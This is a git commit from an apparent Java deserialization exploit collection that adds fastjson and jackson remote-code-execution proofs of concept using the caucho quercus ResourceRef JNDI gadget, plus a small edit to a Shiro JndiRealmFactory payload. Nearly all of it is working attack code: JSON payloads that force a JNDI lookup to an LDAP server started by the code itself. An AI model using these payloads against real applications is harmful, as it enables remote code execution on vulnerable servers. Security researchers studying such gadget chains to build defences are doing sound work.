feat:新增jackson和fastjson通用鸡肋caucho-quercus RCE gadget

“threedr3am” · “threedr3am” · commit aadbd9d6af3c · 2020-03-16T17:19:24.000+08:00
diff --git a/fastjson/pom.xml b/fastjson/pom.xml
@@ -122,5 +122,11 @@
       <artifactId>shiro-core</artifactId>
       <version>1.5.1</version>
     </dependency>
+
+    <dependency>
+      <groupId>com.caucho</groupId>
+      <artifactId>quercus</artifactId>
+      <version>4.0.63</version>
+    </dependency>
   </dependencies>
 </project>
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/QuercusPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/QuercusPoc.java
@@ -0,0 +1,36 @@
+package com.threedr3am.bug.fastjson.rce;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.LdapServer;
+
+/**
+ * fastjson <= 1.2.66 RCE，需要开启AutoType & JSON.parseObject
+ *
+ *
+ * quercus ResourceRef jndi gadget
+ *
+ * <dependency>
+ *       <groupId>com.caucho</groupId>
+ *       <artifactId>quercus</artifactId>
+ *       <version>4.0.63</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class QuercusPoc {
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+
+    String payload = "{\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\"}";//ldap方式
+    JSON.parseObject(payload);
+  }
+}
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/ShiroPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/ShiroPoc.java
@@ -30,7 +30,6 @@ public static void main(String[] args) {
     ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
 
     String payload = "{\"@type\":\"org.apache.shiro.realm.jndi.JndiRealmFactory\", \"jndiNames\":[\"ldap://localhost:43658/Calc\"], \"Realms\":[\"\"]}";//ldap方式
-    System.out.println(payload.charAt(98));
     JSON.parse(payload);
   }
 }
diff --git a/jackson/pom.xml b/jackson/pom.xml
@@ -145,6 +145,12 @@
       <version>2.3.2</version>
     </dependency>
 
+    <dependency>
+      <groupId>com.caucho</groupId>
+      <artifactId>quercus</artifactId>
+      <version>4.0.63</version>
+    </dependency>
+
 
   </dependencies>
 
diff --git a/jackson/src/main/java/com/threedr3am/bug/jackson/rce/QuercusPoc.java b/jackson/src/main/java/com/threedr3am/bug/jackson/rce/QuercusPoc.java
@@ -0,0 +1,41 @@
+package com.threedr3am.bug.jackson.rce;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.fasterxml.jackson.databind.SerializationFeature;
+import com.threedr3am.bug.common.server.LdapServer;
+import java.io.IOException;
+
+/**
+ * 比较鸡肋，需要调用writeValueAsString才能触发
+ *
+ * quercus ResourceRef jndi gadget
+ *
+ * <dependency>
+ *       <groupId>com.caucho</groupId>
+ *       <artifactId>quercus</artifactId>
+ *       <version>4.0.63</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class QuercusPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+
+    String json = "[\"com.caucho.config.types.ResourceRef\", {\"lookupName\": \"ldap://localhost:43658/Calc\"}]";
+    Object o = mapper.readValue(json, Object.class);
+    mapper.writeValueAsString(o);
+  }
+
+
+}

Original file line number	Diff line number	Diff line change
`@@ -30,7 +30,6 @@ public static void main(String[] args) {`
`30`	`30`	`ParserConfig.getGlobalInstance().setAutoTypeSupport(true);`
`31`	`31`
`32`	`32`	`String payload = "{\"@type\":\"org.apache.shiro.realm.jndi.JndiRealmFactory\", \"jndiNames\":[\"ldap://localhost:43658/Calc\"], \"Realms\":[\"\"]}";//ldap方式`
`33`		`- System.out.println(payload.charAt(98));`
`34`	`33`	`JSON.parse(payload);`
`35`	`34`	`}`
`36`	`35`	`}`